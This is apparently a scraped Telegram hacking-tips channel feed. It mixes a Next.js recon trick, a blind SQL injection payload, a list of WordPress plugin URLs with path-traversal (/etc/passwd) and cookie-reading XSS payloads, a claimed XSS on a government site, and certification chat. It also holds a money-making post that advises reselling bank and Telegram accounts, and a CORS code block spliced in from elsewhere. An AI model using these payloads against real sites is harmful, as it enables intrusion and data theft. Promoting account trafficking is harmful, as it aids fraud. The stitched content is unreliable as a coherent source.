🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
🔥Quick NextJS Website Recon Tip by renniepak
A quick way to find "all" paths for Next.js websites:
👇DevTools->Console
console.log(__BUILD_MANIFEST.sortedPages)
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
🚨 Ever wonder why your API calls are getting blocked?
Cross-Origin Resource Sharing (CORS) can be the culprit! When your JavaScript tries to communicate with an API on a different domain, the browser steps in to protect you. CORS ensures that only approved domains can make those requests. Learn how to manage these "preflight" checks and configure your server correctly to allow legitimate cross-origin requests.
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech
https://www.instagram.com/p/C_fObBqShyT/?igsh=dWloN2lpeGx0ZHU0
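A server-side sketch of the origin allowlist and preflight handling that the CORS post above describes, as an added example that is not part of the original post. The origins, methods and header names are constructed sample values, and `corsDecision` is a hypothetical helper.

```javascript
// Constructed sample policy: origins, methods and headers are illustrative.
const ALLOWED_ORIGINS = new Set(["https://app.example.com"]);
const ALLOWED_METHODS = ["GET", "POST", "DELETE"];
const ALLOWED_HEADERS = ["content-type", "authorization"];

// Decide the CORS part of a response. `req` is { method, headers } with
// lower-cased header names, as Node's http module delivers them.
// Returns { status, headers }; status is null when the normal handler should run.
function corsDecision(req) {
  const origin = req.headers["origin"];
  const headers = { "Vary": "Origin" }; // response differs per Origin, so caches must key on it
  const isPreflight = req.method === "OPTIONS" &&
    "access-control-request-method" in req.headers;

  // Exact string match against the allowlist; never echo an arbitrary Origin.
  if (!origin || !ALLOWED_ORIGINS.has(origin)) {
    // No CORS headers: the browser refuses to expose the response to the page.
    return { status: isPreflight ? 403 : null, headers };
  }
  headers["Access-Control-Allow-Origin"] = origin;
  headers["Access-Control-Allow-Credentials"] = "true";
  if (!isPreflight) return { status: null, headers };

  // Preflight: check what the browser says the real request will use.
  const wantMethod = req.headers["access-control-request-method"];
  const wantHeaders = (req.headers["access-control-request-headers"] || "")
    .split(",").map((h) => h.trim().toLowerCase()).filter(Boolean);
  const ok = ALLOWED_METHODS.includes(wantMethod) &&
    wantHeaders.every((h) => ALLOWED_HEADERS.includes(h));
  if (!ok) return { status: 403, headers: { "Vary": "Origin" } };

  headers["Access-Control-Allow-Methods"] = ALLOWED_METHODS.join(", ");
  headers["Access-Control-Allow-Headers"] = ALLOWED_HEADERS.join(", ");
  headers["Access-Control-Max-Age"] = "600"; // cache the preflight result for 10 minutes
  return { status: 204, headers };
}

// Constructed requests: an allowed preflight, a look-alike origin, a disallowed method.
const samples = [
  { method: "OPTIONS", headers: { origin: "https://app.example.com",
      "access-control-request-method": "POST",
      "access-control-request-headers": "Content-Type, Authorization" } },
  { method: "OPTIONS", headers: { origin: "https://app.example.com.other.test",
      "access-control-request-method": "POST" } },
  { method: "OPTIONS", headers: { origin: "https://app.example.com",
      "access-control-request-method": "PATCH" } },
];
for (const s of samples) console.log(s.headers.origin, "->", corsDecision(s).status);
```

In a Node `http` handler, call it first, copy the returned headers onto the response, and end the response there when `status` is not null.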
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
⚡️WordPress endpoints to look at -
Check these if you have these plugins. ⚡️
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Deobfuscation and analysis of client-side JavaScript code to detect DOM-based XSS.
Today I got an interesting reflected XSS in a Karnataka gov website, /kn, where the lang_name param is vulnerable.
Thanks, guys, for this suggestion. I was stuck, but seeing the money and the content provided by Hack The Box Academy, I am planning to first take the CPT, as it covers almost all the topics, and also so many people say that the exam is tougher than OSCP. So after reading all those articles, Reddit suggestions and YouTube reviews, I am planning to first complete the CPT; once done, I will take the OSCP later. And I also suggest this to you guys only if you are a beginner or an intermediate: first take the alternative courses to OSCP, and once you get things done, you will get confident and later you can pass the OSCP in one go. Because it costs a lot... 🤑💰
Follow the Tech Tips and_hacking channel on WhatsApp: https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A
Add the folder 'home/000~ROOT~000/' to your wordlist, and you might discover some juicy data. Enjoy!
OSI Model
The OSI (Open Systems Interconnection) model is a conceptual framework used to understand and standardize the functions of a networking system. It divides the process of communication in a network into seven distinct layers, each responsible for different aspects of data transmission.
The Seven Layers:
1️⃣Physical Layer (Layer 1): Deals with the physical connection between devices, including cables, switches, and the transmission of raw binary data.
2️⃣Data Link Layer (Layer 2): Manages the data frames between two directly connected nodes and handles error detection and correction.
3️⃣Network Layer (Layer 3): Responsible for logical addressing and routing, ensuring that data packets are sent from the source to the destination across multiple networks.
4️⃣Transport Layer (Layer 4): Provides end-to-end communication, error recovery, and flow control between devices, often using protocols like TCP and UDP.
5️⃣Session Layer (Layer 5): Manages sessions or connections between applications, establishing, maintaining, and terminating communication.
6️⃣Presentation Layer (Layer 6): Translates data between the application layer and the network, handling data encryption, compression, and conversion.
7️⃣Application Layer (Layer 7): Interfaces directly with the end user, providing network services such as email, file transfer, and web browsing.
🔵 How to make money on Telegram {Full Guide} 🔤
1. Start doing airdrops today! When a new cryptocurrency launches and pays people for small tasks like channel joins and referrals, it is called an airdrop.
There are many telegram bots for Airdrops which are legit like KuCoin , Tomarket etc
2. Make a channel and start collecting audience. If you have audience, then you can sell courses and things, you can earn by Ad revenue, you can earn by doing Promotions.
There is always an easy way and a hard way for everything. If you want the hard way, then you can make content and share it in the channel with your channel link in the post so that organic members come when the audience shares your post. OR by the easy way you can invest some money to buy paid promotions and easily scale up your earnings and reach. (Easy way is better in my view)
3. Now on your channel, you can refer, you can sell, you can promote. Earnings will increase in proportion to activeness in your channel. So NEVER force anyone to join your channel. [It's so cheap]
4. Join public groups and start reselling stuff like Bank accounts, ott accounts, subscriptions, tg accounts or any stuff. Market on Telegram Groups is so big. You haven't seen it yet.
5. It's important to keep your mind calm and bring consistency in your work to make it work. So eat healthy, meditate 10 mins daily and live with good mindset people. Your company decides your future.
https://cyfare.net/
- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox
Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html
Analysis of CVE-2024-43044 - From file read to RCE in Jenkins through agents
https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
☄️AutoRecon- It is a multi-threaded network reconnaissance tool which performs automated enumeration of services.
🔗https://github.com/Tib3rius/AutoRecon
Actually, I am using a foreign number, so no need to worry if it's banned in India.
https://medium.com/@pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce
I am really sorry, guys. I left my place because of some emergency work. I will only be coming back on Monday, so I will not be active till Monday, so please don't mind.
Small update on the upcoming video
I will upload it soon😌
I was Meditating for Ideas And This Popped up
" The Thoughts From Universe"
Idk We will call It whatever
Coz I am not familiar with this concept
Says That
Universe Live At Harmony at Neutral state(=) and That's the Refresh point
But Grows and Falls on charge state ( - or +)
Means At charged State It Grows
Eg - Success and Failure
And In Charge state
Both comes in one Hand
If There success then Failure Will be must And
Both success and Failure will try to be of Equal charge
Eg - 10 wins Means Mostly You will get 10 Failure too After the Wins
But At fall state You can Neutralise It by Wins Or Something Polar opposite to That
To Refresh the starting point
Like If You Are Having Intense Cravings about Something
Then Think Painful thoughts about that Addiction
Then Thing will neutralise
I Just Wrote this down
Coz I found this interesting
And It's A Thought from somewhere in Universe
I know it sounds lots like Yapping
But I would take it seriously
- Aijak Ofc